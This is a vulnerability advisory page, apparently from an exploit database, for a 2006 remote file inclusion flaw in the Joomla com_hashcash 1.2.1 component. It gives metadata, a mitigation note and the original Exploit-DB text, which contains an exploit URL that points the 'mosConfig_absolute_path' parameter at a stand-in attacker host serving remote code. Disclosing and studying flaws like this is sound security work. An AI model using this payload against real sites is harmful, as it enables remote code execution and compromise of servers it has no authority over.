Hashcash Component

vendor:

com_hashcash Component

by:

Ahmad Maulana a.k.a Matdhule

CVSS

CRITICAL

Remote File Inclusion

CWE

Product Name: com_hashcash Component

Affected Version From: 1.2.1

Affected Version To: 1.2.1

Patch Exists: NO

Related CWE: None

CPE: a:joomla:joomla:1.2.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2006

A vulnerability exists in the com_hashcash component of Joomla! version 1.2.1, which allows an attacker to include a remote file via the 'mosConfig_absolute_path' parameter in the 'server.php' script.

Mitigation:

Ensure that user input is validated and filtered before being used in a file path. Additionally, ensure that the application is running with the least privileges necessary.

Source

Exploit-DB raw data:

# Hashcash Component

Author          : Ahmad Maulana a.k.a Matdhule
Date            : July 12th 2006
Location        : Indonesia, Jakarta
Web             : http://advisories.echo.or.id/adv/adv38-matdhule-2006.txt
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
------------------------------------------------------------------------ 

Application     : com_hashcash Component
version         : 1.2.1
URL             : http://developer.joomla.org/sf/frs/do/viewRelease/projects.com_hashcash/frs.components.com_hashcash

Exploit:
http://[target]/[path]/components/com_hashcash/server.php?mosConfig_absolute_path= http://attacker.com/evil.txt?

# milw0rm.com [2006-07-17]